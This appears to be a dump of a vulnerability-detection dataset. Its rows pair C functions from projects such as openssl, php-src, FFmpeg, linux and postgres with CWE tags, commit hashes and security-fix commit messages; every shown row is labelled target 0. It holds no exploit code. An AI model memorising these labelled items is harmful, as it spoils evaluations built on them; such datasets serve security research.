func
stringlengths
0
484k
target
int64
0
1
cwe
listlengths
0
4
project
stringclasses
799 values
commit_id
stringlengths
40
40
hash
float64
1,215,700,430,453,689,100,000,000B
340,281,914,521,452,260,000,000,000,000B
size
int64
1
24k
message
stringlengths
0
13.3k
static int ZEND_FASTCALL ZEND_FETCH_OBJ_RW_SPEC_CV_VAR_HANDLER(ZEND_OPCODE_HANDLER_ARGS) { zend_op *opline = EX(opline); zend_free_op free_op1, free_op2; zval *property = _get_zval_ptr_var(&opline->op2, EX(Ts), &free_op2 TSRMLS_CC); zval **container = _get_zval_ptr_ptr_cv(&opline->op1, EX(Ts), BP_VAR_RW TSRMLS_CC); if (0) { MAKE_REAL_ZVAL_PTR(property); } if (IS_CV == IS_VAR && !container) { zend_error_noreturn(E_ERROR, "Cannot use string offset as an object"); } zend_fetch_property_address(&EX_T(opline->result.u.var), container, property, BP_VAR_RW TSRMLS_CC); if (0) { zval_ptr_dtor(&property); } else { if (free_op2.var) {zval_ptr_dtor(&free_op2.var);}; } if (IS_CV == IS_VAR && 0 && READY_TO_DESTROY(free_op1.var)) { AI_USE_PTR(EX_T(opline->result.u.var).var); if (!PZVAL_IS_REF(*EX_T(opline->result.u.var).var.ptr_ptr) && Z_REFCOUNT_PP(EX_T(opline->result.u.var).var.ptr_ptr) > 2) { SEPARATE_ZVAL(EX_T(opline->result.u.var).var.ptr_ptr); } } ZEND_VM_NEXT_OPCODE(); }
0
[]
php-src
ce96fd6b0761d98353761bf78d5bfb55291179fd
155,338,722,407,056,550,000,000,000,000,000,000,000
30
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
inline static void _set_priority(priority_st * st, const int *list) { int num = 0, i; while (list[num] != 0) num++; if (num > MAX_ALGOS) num = MAX_ALGOS; st->algorithms = num; for (i = 0; i < num; i++) { st->priority[i] = list[i]; } return; }
0
[ "CWE-310" ]
gnutls
21f89efad7014a5ee0debd4cd3d59e27774b29e6
104,832,585,941,476,090,000,000,000,000,000,000,000
16
handshake: add FALLBACK_SCSV priority option This allows clients to enable the TLS_FALLBACK_SCSV mechanism during the handshake, as defined in RFC7507.
int ff_side_data_update_matrix_encoding(AVFrame *frame, enum AVMatrixEncoding matrix_encoding) { AVFrameSideData *side_data; enum AVMatrixEncoding *data; side_data = av_frame_get_side_data(frame, AV_FRAME_DATA_MATRIXENCODING); if (!side_data) side_data = av_frame_new_side_data(frame, AV_FRAME_DATA_MATRIXENCODING, sizeof(enum AVMatrixEncoding)); if (!side_data) return AVERROR(ENOMEM); data = (enum AVMatrixEncoding*)side_data->data; *data = matrix_encoding; return 0; }
0
[ "CWE-703" ]
FFmpeg
e5c7229999182ad1cef13b9eca050dba7a5a08da
97,814,553,009,169,970,000,000,000,000,000,000,000
19
avcodec/utils: set AVFrame format unconditional Fixes inconsistency and out of array accesses Fixes: 10cdd7e63e7f66e3e66273939e0863dd-asan_heap-oob_1a4ff32_7078_cov_4056274555_mov_h264_aac__mp4box_frag.mp4 Found-by: Mateusz "j00ru" Jurczyk and Gynvael Coldwind Signed-off-by: Michael Niedermayer <[email protected]>
int imap_fast_trash(struct Context *ctx, char *dest) { char mbox[LONG_STRING]; char mmbox[LONG_STRING]; char prompt[LONG_STRING]; int rc; struct ImapMbox mx; bool triedcreate = false; struct Buffer *sync_cmd = NULL; int err_continue = MUTT_NO; struct ImapData *idata = ctx->data; if (imap_parse_path(dest, &mx)) { mutt_debug(1, "bad destination %s\n", dest); return -1; } /* check that the save-to folder is in the same account */ if (mutt_account_match(&(idata->conn->account), &(mx.account)) == 0) { mutt_debug(3, "%s not same server as %s\n", dest, ctx->path); return 1; } imap_fix_path(idata, mx.mbox, mbox, sizeof(mbox)); if (!*mbox) mutt_str_strfcpy(mbox, "INBOX", sizeof(mbox)); imap_munge_mbox_name(idata, mmbox, sizeof(mmbox), mbox); sync_cmd = mutt_buffer_new(); for (int i = 0; i < ctx->msgcount; i++) { if (ctx->hdrs[i]->active && ctx->hdrs[i]->changed && ctx->hdrs[i]->deleted && !ctx->hdrs[i]->purge) { rc = imap_sync_message_for_copy(idata, ctx->hdrs[i], sync_cmd, &err_continue); if (rc < 0) { mutt_debug(1, "could not sync\n"); goto out; } } } /* loop in case of TRYCREATE */ do { rc = imap_exec_msgset(idata, "UID COPY", mmbox, MUTT_TRASH, 0, 0); if (!rc) { mutt_debug(1, "No messages to trash\n"); rc = -1; goto out; } else if (rc < 0) { mutt_debug(1, "could not queue copy\n"); goto out; } else { mutt_message(ngettext("Copying %d message to %s...", "Copying %d messages to %s...", rc), rc, mbox); } /* let's get it on */ rc = imap_exec(idata, NULL, IMAP_CMD_FAIL_OK); if (rc == -2) { if (triedcreate) { mutt_debug(1, "Already tried to create mailbox %s\n", mbox); break; } /* bail out if command failed for reasons other than nonexistent target */ if (mutt_str_strncasecmp(imap_get_qualifier(idata->buf), "[TRYCREATE]", 11) != 0) break; mutt_debug(3, "server suggests TRYCREATE\n"); snprintf(prompt, sizeof(prompt), _("Create %s?"), mbox); if (Confirmcreate && mutt_yesorno(prompt, 1) != MUTT_YES) { mutt_clear_error(); goto out; } if (imap_create_mailbox(idata, mbox) < 0) 
break; triedcreate = true; } } while (rc == -2); if (rc != 0) { imap_error("imap_fast_trash", idata->buf); goto out; } rc = 0; out: mutt_buffer_free(&sync_cmd); FREE(&mx.mbox); return (rc < 0) ? -1 : rc; }
0
[ "CWE-78", "CWE-77" ]
neomutt
95e80bf9ff10f68cb6443f760b85df4117cb15eb
208,102,472,246,240,420,000,000,000,000,000,000,000
106
Quote path in imap_subscribe
ExecRuntime *unit_get_exec_runtime(Unit *u) { size_t offset; if (u->type < 0) return NULL; offset = UNIT_VTABLE(u)->exec_runtime_offset; if (offset <= 0) return NULL; return *(ExecRuntime**) ((uint8_t*) u + offset); }
0
[ "CWE-269" ]
systemd
bf65b7e0c9fc215897b676ab9a7c9d1c688143ba
35,527,336,205,894,680,000,000,000,000,000,000,000
12
core: imply NNP and SUID/SGID restriction for DynamicUser=yes service Let's be safe, rather than sorry. This way DynamicUser=yes services can neither take benefit of, nor create SUID/SGID binaries. Given that DynamicUser= is a recent addition only we should be able to get away with turning this on, even though this is strictly speaking a binary compatibility breakage.
AlterObjectNamespace_oid(Oid classId, Oid objid, Oid nspOid, ObjectAddresses *objsMoved) { Oid oldNspOid = InvalidOid; ObjectAddress dep; dep.classId = classId; dep.objectId = objid; dep.objectSubId = 0; switch (getObjectClass(&dep)) { case OCLASS_CLASS: { Relation rel; rel = relation_open(objid, AccessExclusiveLock); oldNspOid = RelationGetNamespace(rel); AlterTableNamespaceInternal(rel, oldNspOid, nspOid, objsMoved); relation_close(rel, NoLock); break; } case OCLASS_TYPE: oldNspOid = AlterTypeNamespace_oid(objid, nspOid, objsMoved); break; case OCLASS_PROC: case OCLASS_COLLATION: case OCLASS_CONVERSION: case OCLASS_OPERATOR: case OCLASS_OPCLASS: case OCLASS_OPFAMILY: case OCLASS_STATISTIC_EXT: case OCLASS_TSPARSER: case OCLASS_TSDICT: case OCLASS_TSTEMPLATE: case OCLASS_TSCONFIG: { Relation catalog; catalog = table_open(classId, RowExclusiveLock); oldNspOid = AlterObjectNamespace_internal(catalog, objid, nspOid); table_close(catalog, RowExclusiveLock); } break; case OCLASS_CAST: case OCLASS_CONSTRAINT: case OCLASS_DEFAULT: case OCLASS_LANGUAGE: case OCLASS_LARGEOBJECT: case OCLASS_AM: case OCLASS_AMOP: case OCLASS_AMPROC: case OCLASS_REWRITE: case OCLASS_TRIGGER: case OCLASS_SCHEMA: case OCLASS_ROLE: case OCLASS_DATABASE: case OCLASS_TBLSPACE: case OCLASS_FDW: case OCLASS_FOREIGN_SERVER: case OCLASS_USER_MAPPING: case OCLASS_DEFACL: case OCLASS_EXTENSION: case OCLASS_EVENT_TRIGGER: case OCLASS_POLICY: case OCLASS_PUBLICATION: case OCLASS_PUBLICATION_REL: case OCLASS_SUBSCRIPTION: case OCLASS_TRANSFORM: /* ignore object types that don't have schema-qualified names */ break; /* * There's intentionally no default: case here; we want the * compiler to warn if a new OCLASS hasn't been handled above. */ } return oldNspOid; }
0
[ "CWE-862" ]
postgres
b048f558dd7c26a0c630a2cff29d3d8981eaf6b9
273,593,337,679,603,000,000,000,000,000,000,000,000
88
Fix priv checks for ALTER <object> DEPENDS ON EXTENSION Marking an object as dependant on an extension did not have any privilege check whatsoever; this allowed any user to mark objects as droppable by anyone able to DROP EXTENSION, which could be used to cause system-wide havoc. Disallow by checking that the calling user owns the mentioned object. (No constraints are placed on the extension.) Security: CVE-2020-1720 Reported-by: Tom Lane Discussion: [email protected]
t2p_sizeproc(thandle_t handle) { (void) handle; return -1; }
0
[ "CWE-787" ]
libtiff
7be2e452ddcf6d7abca88f41d3761e6edab72b22
281,615,789,486,612,850,000,000,000,000,000,000,000
5
tiff2pdf.c: properly calculate datasize when saving to JPEG YCbCr fixes #220
static void GTextFieldInit() { FontRequest rq; memset(&rq,0,sizeof(rq)); GGadgetInit(); GDrawDecomposeFont(_ggadget_default_font,&rq); rq.family_name = NULL; rq.utf8_family_name = MONO_UI_FAMILIES; _gtextfield_font = GDrawInstanciateFont(NULL,&rq); _GGadgetCopyDefaultBox(&_GGadget_gtextfield_box); _GGadget_gtextfield_box.padding = 3; /*_GGadget_gtextfield_box.flags = box_active_border_inner;*/ _gtextfield_font = _GGadgetInitDefaultBox("GTextField.",&_GGadget_gtextfield_box,_gtextfield_font); glistfield_box = _GGadget_gtextfield_box; _GGadgetInitDefaultBox("GComboBox.",&glistfield_box,_gtextfield_font); glistfieldmenu_box = glistfield_box; glistfieldmenu_box.padding = 1; _GGadgetInitDefaultBox("GComboBoxMenu.",&glistfieldmenu_box,_gtextfield_font); gnumericfield_box = _GGadget_gtextfield_box; _GGadgetInitDefaultBox("GNumericField.",&gnumericfield_box,_gtextfield_font); gnumericfieldspinner_box = gnumericfield_box; gnumericfieldspinner_box.border_type = bt_none; gnumericfieldspinner_box.border_width = 0; gnumericfieldspinner_box.padding = 0; _GGadgetInitDefaultBox("GNumericFieldSpinner.",&gnumericfieldspinner_box,_gtextfield_font); gtextfield_inited = true; }
0
[ "CWE-119", "CWE-787" ]
fontforge
626f751752875a0ddd74b9e217b6f4828713573c
7,935,713,096,855,530,000,000,000,000,000,000,000
27
Warn users before discarding their unsaved scripts (#3852) * Warn users before discarding their unsaved scripts This closes #3846.
static int file_close(jas_stream_obj_t *obj) { jas_stream_fileobj_t *fileobj = JAS_CAST(jas_stream_fileobj_t *, obj); int ret; ret = close(fileobj->fd); if (fileobj->flags & JAS_STREAM_FILEOBJ_DELONCLOSE) { unlink(fileobj->pathname); } jas_free(fileobj); return ret; }
0
[ "CWE-189" ]
jasper
3c55b399c36ef46befcb21e4ebc4799367f89684
248,434,265,937,089,800,000,000,000,000,000,000,000
11
At many places in the code, jas_malloc or jas_recalloc was being invoked with the size argument being computed in a manner that would not allow integer overflow to be detected. Now, these places in the code have been modified to use special-purpose memory allocation functions (e.g., jas_alloc2, jas_alloc3, jas_realloc2) that check for overflow. This should fix many security problems.
static int pop_stack(struct bpf_verifier_env *env, int *prev_insn_idx) { struct bpf_verifier_stack_elem *elem; int insn_idx; if (env->head == NULL) return -1; memcpy(&env->cur_state, &env->head->st, sizeof(env->cur_state)); insn_idx = env->head->insn_idx; if (prev_insn_idx) *prev_insn_idx = env->head->prev_insn_idx; elem = env->head->next; kfree(env->head); env->head = elem; env->stack_size--; return insn_idx; }
0
[ "CWE-200" ]
linux
0d0e57697f162da4aa218b5feafe614fb666db07
286,245,177,078,094,100,000,000,000,000,000,000,000
18
bpf: don't let ldimm64 leak map addresses on unprivileged The patch fixes two things at once: 1) It checks the env->allow_ptr_leaks and only prints the map address to the log if we have the privileges to do so, otherwise it just dumps 0 as we would when kptr_restrict is enabled on %pK. Given the latter is off by default and not every distro sets it, I don't want to rely on this, hence the 0 by default for unprivileged. 2) Printing of ldimm64 in the verifier log is currently broken in that we don't print the full immediate, but only the 32 bit part of the first insn part for ldimm64. Thus, fix this up as well; it's okay to access, since we verified all ldimm64 earlier already (including just constants) through replace_map_fd_with_map_ptr(). Fixes: 1be7f75d1668 ("bpf: enable non-root eBPF programs") Fixes: cbd357008604 ("bpf: verifier (add ability to receive verification log)") Reported-by: Jann Horn <[email protected]> Signed-off-by: Daniel Borkmann <[email protected]> Acked-by: Alexei Starovoitov <[email protected]> Signed-off-by: David S. Miller <[email protected]>
static int TS_check_policy(ASN1_OBJECT *req_oid, TS_TST_INFO *tst_info) { ASN1_OBJECT *resp_oid = TS_TST_INFO_get_policy_id(tst_info); if (OBJ_cmp(req_oid, resp_oid) != 0) { TSerr(TS_F_TS_CHECK_POLICY, TS_R_POLICY_MISMATCH); return 0; } return 1; }
0
[]
openssl
c7235be6e36c4bef84594aa3b2f0561db84b63d8
217,919,661,057,956,200,000,000,000,000,000,000,000
12
RFC 3161 compliant time stamp request creation, response generation and response verification. Submitted by: Zoltan Glozik <[email protected]> Reviewed by: Ulf Moeller
cgiSetSize(const char *name, /* I - Name of variable */ int size) /* I - Number of elements (0 to N) */ { int i; /* Looping var */ _cgi_var_t *var; /* Returned variable */ if (name == NULL || size < 0 || size > 100000) return; if ((var = cgi_find_variable(name)) == NULL) return; if (size >= var->avalues) { const char **temp; /* Temporary pointer */ temp = (const char **)realloc((void *)(var->values), sizeof(char *) * (size_t)(size + 16)); if (!temp) return; var->avalues = size + 16; var->values = temp; } if (size > var->nvalues) { for (i = var->nvalues; i < size; i ++) var->values[i] = NULL; } else if (size < var->nvalues) { for (i = size; i < var->nvalues; i ++) if (var->values[i]) _cupsStrFree((void *)(var->values[i])); } var->nvalues = size; }
0
[]
cups
b9ff93ce913ff633a3f667317e5a81fa7fe0d5d3
338,563,325,748,653,940,000,000,000,000,000,000,000
40
CVE-2018-4700: Linux session cookies used a predictable random number seed.
struct kvm_memory_slot *kvm_vcpu_gfn_to_memslot(struct kvm_vcpu *vcpu, gfn_t gfn) { struct kvm_memslots *slots = kvm_vcpu_memslots(vcpu); u64 gen = slots->generation; struct kvm_memory_slot *slot; /* * This also protects against using a memslot from a different address space, * since different address spaces have different generation numbers. */ if (unlikely(gen != vcpu->last_used_slot_gen)) { vcpu->last_used_slot = NULL; vcpu->last_used_slot_gen = gen; } slot = try_get_memslot(vcpu->last_used_slot, gfn); if (slot) return slot; /* * Fall back to searching all memslots. We purposely use * search_memslots() instead of __gfn_to_memslot() to avoid * thrashing the VM-wide last_used_slot in kvm_memslots. */ slot = search_memslots(slots, gfn, false); if (slot) { vcpu->last_used_slot = slot; return slot; } return NULL;
0
[ "CWE-459" ]
linux
683412ccf61294d727ead4a73d97397396e69a6b
114,559,505,459,033,920,000,000,000,000,000,000,000
32
KVM: SEV: add cache flush to solve SEV cache incoherency issues Flush the CPU caches when memory is reclaimed from an SEV guest (where reclaim also includes it being unmapped from KVM's memslots). Due to lack of coherency for SEV encrypted memory, failure to flush results in silent data corruption if userspace is malicious/broken and doesn't ensure SEV guest memory is properly pinned and unpinned. Cache coherency is not enforced across the VM boundary in SEV (AMD APM vol.2 Section 15.34.7). Confidential cachelines, generated by confidential VM guests have to be explicitly flushed on the host side. If a memory page containing dirty confidential cachelines was released by VM and reallocated to another user, the cachelines may corrupt the new user at a later time. KVM takes a shortcut by assuming all confidential memory remain pinned until the end of VM lifetime. Therefore, KVM does not flush cache at mmu_notifier invalidation events. Because of this incorrect assumption and the lack of cache flushing, malicous userspace can crash the host kernel: creating a malicious VM and continuously allocates/releases unpinned confidential memory pages when the VM is running. Add cache flush operations to mmu_notifier operations to ensure that any physical memory leaving the guest VM get flushed. In particular, hook mmu_notifier_invalidate_range_start and mmu_notifier_release events and flush cache accordingly. The hook after releasing the mmu lock to avoid contention with other vCPUs. Cc: [email protected] Suggested-by: Sean Christpherson <[email protected]> Reported-by: Mingwei Zhang <[email protected]> Signed-off-by: Mingwei Zhang <[email protected]> Message-Id: <[email protected]> Signed-off-by: Paolo Bonzini <[email protected]>
w3m_exit(int i) { #ifdef USE_MIGEMO init_migemo(); /* close pipe to migemo */ #endif stopDownload(); deleteFiles(); #ifdef USE_SSL free_ssl_ctx(); #endif disconnectFTP(); #ifdef USE_NNTP disconnectNews(); #endif #ifdef __MINGW32_VERSION WSACleanup(); #endif #ifdef HAVE_MKDTEMP if (no_rc_dir && tmp_dir != rc_dir) if (rmdir(tmp_dir) != 0) { fprintf(stderr, "Can't remove temporary directory (%s)!\n", tmp_dir); exit(1); } #endif exit(i); }
0
[ "CWE-59", "CWE-241" ]
w3m
18dcbadf2771cdb0c18509b14e4e73505b242753
247,135,278,041,220,600,000,000,000,000,000,000,000
26
Make temporary directory safely when ~/.w3m is unwritable
static ssize_t ucma_create_id(struct ucma_file *file, const char __user *inbuf, int in_len, int out_len) { struct rdma_ucm_create_id cmd; struct rdma_ucm_create_id_resp resp; struct ucma_context *ctx; enum ib_qp_type qp_type; int ret; if (out_len < sizeof(resp)) return -ENOSPC; if (copy_from_user(&cmd, inbuf, sizeof(cmd))) return -EFAULT; ret = ucma_get_qp_type(&cmd, &qp_type); if (ret) return ret; mutex_lock(&file->mut); ctx = ucma_alloc_ctx(file); mutex_unlock(&file->mut); if (!ctx) return -ENOMEM; ctx->uid = cmd.uid; ctx->cm_id = rdma_create_id(current->nsproxy->net_ns, ucma_event_handler, ctx, cmd.ps, qp_type); if (IS_ERR(ctx->cm_id)) { ret = PTR_ERR(ctx->cm_id); goto err1; } resp.id = ctx->id; if (copy_to_user((void __user *)(unsigned long)cmd.response, &resp, sizeof(resp))) { ret = -EFAULT; goto err2; } return 0; err2: rdma_destroy_id(ctx->cm_id); err1: mutex_lock(&mut); idr_remove(&ctx_idr, ctx->id); mutex_unlock(&mut); kfree(ctx); return ret; }
0
[ "CWE-284", "CWE-264" ]
linux
e6bd18f57aad1a2d1ef40e646d03ed0f2515c9e3
205,677,568,497,960,550,000,000,000,000,000,000,000
50
IB/security: Restrict use of the write() interface The drivers/infiniband stack uses write() as a replacement for bi-directional ioctl(). This is not safe. There are ways to trigger write calls that result in the return structure that is normally written to user space being shunted off to user specified kernel memory instead. For the immediate repair, detect and deny suspicious accesses to the write API. For long term, update the user space libraries and the kernel API to something that doesn't present the same security vulnerabilities (likely a structured ioctl() interface). The impacted uAPI interfaces are generally only available if hardware from drivers/infiniband is installed in the system. Reported-by: Jann Horn <[email protected]> Signed-off-by: Linus Torvalds <[email protected]> Signed-off-by: Jason Gunthorpe <[email protected]> [ Expanded check to all known write() entry points ] Cc: [email protected] Signed-off-by: Doug Ledford <[email protected]>
xdr_gpols_ret(XDR *xdrs, gpols_ret *objp) { if (!xdr_ui_4(xdrs, &objp->api_version)) { return (FALSE); } if (!xdr_kadm5_ret_t(xdrs, &objp->code)) { return (FALSE); } if (objp->code == KADM5_OK) { if (!xdr_int(xdrs, &objp->count)) { return (FALSE); } if (!xdr_array(xdrs, (caddr_t *) &objp->pols, (unsigned int *) &objp->count, ~0, sizeof(char *), xdr_nullstring)) { return (FALSE); } } return (TRUE); }
0
[ "CWE-703" ]
krb5
a197e92349a4aa2141b5dff12e9dd44c2a2166e3
297,112,340,943,592,950,000,000,000,000,000,000,000
21
Fix kadm5/gssrpc XDR double free [CVE-2014-9421] [MITKRB5-SA-2015-001] In auth_gssapi_unwrap_data(), do not free partial deserialization results upon failure to deserialize. This responsibility belongs to the callers, svctcp_getargs() and svcudp_getargs(); doing it in the unwrap function results in freeing the results twice. In xdr_krb5_tl_data() and xdr_krb5_principal(), null out the pointers we are freeing, as other XDR functions such as xdr_bytes() and xdr_string(). ticket: 8056 (new) target_version: 1.13.1 tags: pullup
cmsStage* ReadCLUT(struct _cms_typehandler_struct* self, cmsIOHANDLER* io, cmsUInt32Number Offset, int InputChannels, int OutputChannels) { cmsUInt8Number gridPoints8[cmsMAXCHANNELS]; // Number of grid points in each dimension. cmsUInt32Number GridPoints[cmsMAXCHANNELS], i; cmsUInt8Number Precision; cmsStage* CLUT; _cmsStageCLutData* Data; if (!io -> Seek(io, Offset)) return NULL; if (io -> Read(io, gridPoints8, cmsMAXCHANNELS, 1) != 1) return NULL; for (i=0; i < cmsMAXCHANNELS; i++) { if (gridPoints8[i] == 1) return NULL; // Impossible value, 0 for no CLUT and then 2 at least GridPoints[i] = gridPoints8[i]; } if (!_cmsReadUInt8Number(io, &Precision)) return NULL; if (!_cmsReadUInt8Number(io, NULL)) return NULL; if (!_cmsReadUInt8Number(io, NULL)) return NULL; if (!_cmsReadUInt8Number(io, NULL)) return NULL; CLUT = cmsStageAllocCLut16bitGranular(self ->ContextID, GridPoints, InputChannels, OutputChannels, NULL); if (CLUT == NULL) return NULL; Data = (_cmsStageCLutData*) CLUT ->Data; // Precision can be 1 or 2 bytes if (Precision == 1) { cmsUInt8Number v; for (i=0; i < Data ->nEntries; i++) { if (io ->Read(io, &v, sizeof(cmsUInt8Number), 1) != 1) return NULL; Data ->Tab.T[i] = FROM_8_TO_16(v); } } else if (Precision == 2) { if (!_cmsReadUInt16Array(io, Data->nEntries, Data ->Tab.T)) { cmsStageFree(CLUT); return NULL; } } else { cmsStageFree(CLUT); cmsSignalError(self ->ContextID, cmsERROR_UNKNOWN_EXTENSION, "Unknown precision of '%d'", Precision); return NULL; } return CLUT; }
0
[ "CWE-125" ]
Little-CMS
5ca71a7bc18b6897ab21d815d15e218e204581e2
272,827,695,283,645,800,000,000,000,000,000,000,000
57
Added an extra check to MLU bounds Thanks to Ibrahim el-sayed for spotting the bug
dtls1_process_heartbeat(SSL *s) { unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned short hbtype; unsigned int payload; unsigned int padding = 16; /* Use minimum padding */ if (s->msg_callback) s->msg_callback(0, s->version, TLS1_RT_HEARTBEAT, &s->s3->rrec.data[0], s->s3->rrec.length, s, s->msg_callback_arg); /* Read type and payload length first */ if (1 + 2 + 16 > s->s3->rrec.length) return 0; /* silently discard */ hbtype = *p++; n2s(p, payload); if (1 + 2 + payload + 16 > s->s3->rrec.length) return 0; /* silently discard per RFC 6520 sec. 4 */ pl = p; if (hbtype == TLS1_HB_REQUEST) { unsigned char *buffer, *bp; unsigned int write_length = 1 /* heartbeat type */ + 2 /* heartbeat length */ + payload + padding; int r; if (write_length > SSL3_RT_MAX_PLAIN_LENGTH) return 0; /* Allocate memory for the response, size is 1 byte * message type, plus 2 bytes payload length, plus * payload, plus padding */ buffer = OPENSSL_malloc(write_length); bp = buffer; /* Enter response type, length and copy payload */ *bp++ = TLS1_HB_RESPONSE; s2n(payload, bp); memcpy(bp, pl, payload); bp += payload; /* Random padding */ RAND_pseudo_bytes(bp, padding); r = dtls1_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, write_length); if (r >= 0 && s->msg_callback) s->msg_callback(1, s->version, TLS1_RT_HEARTBEAT, buffer, write_length, s, s->msg_callback_arg); OPENSSL_free(buffer); if (r < 0) return r; } else if (hbtype == TLS1_HB_RESPONSE) { unsigned int seq; /* We only send sequence numbers (2 bytes unsigned int), * and 16 random bytes, so we just try to read the * sequence number */ n2s(pl, seq); if (payload == 18 && seq == s->tlsext_hb_seq) { dtls1_stop_timer(s); s->tlsext_hb_seq++; s->tlsext_hb_pending = 0; } } return 0; }
0
[]
openssl
96db9023b881d7cd9f379b0c154650d6c108e9a3
76,451,328,488,845,400,000,000,000,000,000,000,000
78
Add heartbeat extension bounds check. A missing bounds check in the handling of the TLS heartbeat extension can be used to reveal up to 64k of memory to a connected client or server. Thanks for Neel Mehta of Google Security for discovering this bug and to Adam Langley <[email protected]> and Bodo Moeller <[email protected]> for preparing the fix (CVE-2014-0160)
xmlMemShow(FILE *fp, int nr ATTRIBUTE_UNUSED) { #ifdef MEM_LIST MEMHDR *p; #endif if (fp != NULL) fprintf(fp," MEMORY ALLOCATED : %lu, MAX was %lu\n", debugMemSize, debugMaxMemSize); #ifdef MEM_LIST xmlMutexLock(xmlMemMutex); if (nr > 0) { fprintf(fp,"NUMBER SIZE TYPE WHERE\n"); p = memlist; while ((p) && nr > 0) { fprintf(fp,"%6lu %6lu ",p->mh_number,(unsigned long)p->mh_size); switch (p->mh_type) { case STRDUP_TYPE:fprintf(fp,"strdup() in ");break; case MALLOC_TYPE:fprintf(fp,"malloc() in ");break; case MALLOC_ATOMIC_TYPE:fprintf(fp,"atomicmalloc() in ");break; case REALLOC_TYPE:fprintf(fp,"realloc() in ");break; case REALLOC_ATOMIC_TYPE:fprintf(fp,"atomicrealloc() in ");break; default:fprintf(fp," ??? in ");break; } if (p->mh_file != NULL) fprintf(fp,"%s(%u)", p->mh_file, p->mh_line); if (p->mh_tag != MEMTAG) fprintf(fp," INVALID"); xmlMemContentShow(fp, p); fprintf(fp,"\n"); nr--; p = p->mh_next; } } xmlMutexUnlock(xmlMemMutex); #endif /* MEM_LIST */ }
0
[ "CWE-787" ]
libxml2
897dffbae322b46b83f99a607d527058a72c51ed
45,254,445,319,648,600,000,000,000,000,000,000,000
37
Check for integer overflow in memory debug code Fixes bug 783026. Thanks to Pranjal Jumde for the report.
static PHP_FUNCTION(session_set_save_handler) { zval ***args = NULL; int i, num_args, argc = ZEND_NUM_ARGS(); char *name; if (PS(session_status) != php_session_none) { RETURN_FALSE; } if (argc != 1 && argc != 2 && argc != 6) { WRONG_PARAM_COUNT; } if (argc <= 2) { zval *obj = NULL, *callback = NULL; zend_uint func_name_len; char *func_name; HashPosition pos; zend_function *default_mptr, *current_mptr; ulong func_index; php_shutdown_function_entry shutdown_function_entry; zend_bool register_shutdown = 1; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "O|b", &obj, php_session_iface_entry, &register_shutdown) == FAILURE) { RETURN_FALSE; } /* Find implemented methods */ zend_hash_internal_pointer_reset_ex(&php_session_class_entry->function_table, &pos); i = 0; while (zend_hash_get_current_data_ex(&php_session_class_entry->function_table, (void **) &default_mptr, &pos) == SUCCESS) { zend_hash_get_current_key_ex(&php_session_class_entry->function_table, &func_name, &func_name_len, &func_index, 0, &pos); if (zend_hash_find(&Z_OBJCE_P(obj)->function_table, func_name, func_name_len, (void **)&current_mptr) == SUCCESS) { if (PS(mod_user_names).names[i] != NULL) { zval_ptr_dtor(&PS(mod_user_names).names[i]); } MAKE_STD_ZVAL(callback); array_init_size(callback, 2); Z_ADDREF_P(obj); add_next_index_zval(callback, obj); add_next_index_stringl(callback, func_name, func_name_len - 1, 1); PS(mod_user_names).names[i] = callback; } else { php_error_docref(NULL TSRMLS_CC, E_ERROR, "Session handler's function table is corrupt"); RETURN_FALSE; } zend_hash_move_forward_ex(&php_session_class_entry->function_table, &pos); ++i; } if (register_shutdown) { /* create shutdown function */ shutdown_function_entry.arg_count = 1; shutdown_function_entry.arguments = (zval **) safe_emalloc(sizeof(zval *), 1, 0); MAKE_STD_ZVAL(callback); ZVAL_STRING(callback, "session_register_shutdown", 1); shutdown_function_entry.arguments[0] = callback; /* add shutdown function, removing the old one if it 
exists */ if (!register_user_shutdown_function("session_shutdown", sizeof("session_shutdown"), &shutdown_function_entry TSRMLS_CC)) { zval_ptr_dtor(&callback); efree(shutdown_function_entry.arguments); php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unable to register session shutdown function"); RETURN_FALSE; } } else { /* remove shutdown function */ remove_user_shutdown_function("session_shutdown", sizeof("session_shutdown") TSRMLS_CC); } if (PS(mod) && PS(session_status) == php_session_none && PS(mod) != &ps_mod_user) { zend_alter_ini_entry("session.save_handler", sizeof("session.save_handler"), "user", sizeof("user")-1, PHP_INI_USER, PHP_INI_STAGE_RUNTIME); } RETURN_TRUE; } if (zend_parse_parameters(argc TSRMLS_CC, "+", &args, &num_args) == FAILURE) { return; } /* remove shutdown function */ remove_user_shutdown_function("session_shutdown", sizeof("session_shutdown") TSRMLS_CC); for (i = 0; i < 6; i++) { if (!zend_is_callable(*args[i], 0, &name TSRMLS_CC)) { efree(args); php_error_docref(NULL TSRMLS_CC, E_WARNING, "Argument %d is not a valid callback", i+1); efree(name); RETURN_FALSE; } efree(name); } if (PS(mod) && PS(mod) != &ps_mod_user) { zend_alter_ini_entry("session.save_handler", sizeof("session.save_handler"), "user", sizeof("user")-1, PHP_INI_USER, PHP_INI_STAGE_RUNTIME); } for (i = 0; i < 6; i++) { if (PS(mod_user_names).names[i] != NULL) { zval_ptr_dtor(&PS(mod_user_names).names[i]); } Z_ADDREF_PP(args[i]); PS(mod_user_names).names[i] = *args[i]; } efree(args); RETURN_TRUE; }
0
[]
php-src
df4bf28f9f104ca3ef78ed94b497859f15b004e5
30,985,409,824,692,597,000,000,000,000,000,000,000
114
Fix bug #70219 (Use after free vulnerability in session deserializer)
static bool valid_smtp_code(char *buf, size_t buflen, int *n) { char code[4]; if (buflen < 4) return false; code[0] = buf[0]; code[1] = buf[1]; code[2] = buf[2]; code[3] = '\0'; if (mutt_str_atoi(code, n) < 0) return false; return true; }
0
[ "CWE-94", "CWE-74" ]
neomutt
fb013ec666759cb8a9e294347c7b4c1f597639cc
207,112,861,546,169,800,000,000,000,000,000,000,000
14
tls: clear data after a starttls acknowledgement After a starttls acknowledgement message, clear the buffers of any incoming data / commands. This will ensure that all future data is handled securely. Co-authored-by: Pietro Cerutti <[email protected]>
